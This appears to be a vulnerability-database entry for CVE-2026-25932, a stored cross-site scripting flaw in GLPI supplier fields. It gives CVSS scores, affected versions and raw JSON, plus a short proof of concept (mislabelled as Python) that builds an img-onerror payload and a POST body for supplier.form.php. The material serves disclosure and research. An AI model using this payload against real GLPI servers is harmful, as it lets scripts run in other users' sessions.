Security Vulnerability Report
中文
CVE-2026-25932 CVSS 7.2 HIGH

CVE-2026-25932

Published: 2026-04-06 15:17:07
Last Modified: 2026-04-07 16:04:32

Description

GLPI is a Free Asset and IT Management Software package. From 0.60 to before 10.0.24, an authenticated technician user can store an XSS payload in a supplier fields. This vulnerability is fixed in 10.0.24.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* - VULNERABLE
GLPI >= 0.60, GLPI < 10.0.24

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * PoC for CVE-2026-25932 (Stored XSS in GLPI) * Description: Inject a script into the supplier field to demonstrate execution. */ // Malicious payload to be stored in the supplier name field var payload = '<img src=x onerror=alert(\'XSS-CVE-2026-25932\')>'; // Simulate a POST request to create or update a supplier // Endpoint usually is: /front/supplier.form.php var formData = { 'name': payload, // Injecting payload into the supplier name 'entities_id': '0', 'is_recursive': '1', 'add': 'Save' }; // Note: This requires a valid authenticated session cookie. // An attacker would send this via a crafted HTTP request. console.log('Simulating POST request with payload:', payload); // fetch('/front/supplier.form.php', { method: 'POST', body: new URLSearchParams(formData), credentials: 'include' });

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25932", "sourceIdentifier": "[email protected]", "published": "2026-04-06T15:17:06.907", "lastModified": "2026-04-07T16:04:32.123", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GLPI is a Free Asset and IT Management Software package. From 0.60 to before 10.0.24, an authenticated technician user can store an XSS payload in a supplier fields. This vulnerability is fixed in 10.0.24."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-116"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.60", "versionEndExcluding": "10.0.24", "matchCriteriaId": "BC9D73FE-EEDD-489A-BABB-7B7F6156F0F4"}]}]}], "references": [{"url": "https://github.com/glpi-project/glpi/security/advisories/GHSA-m627-945g-x7xh", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}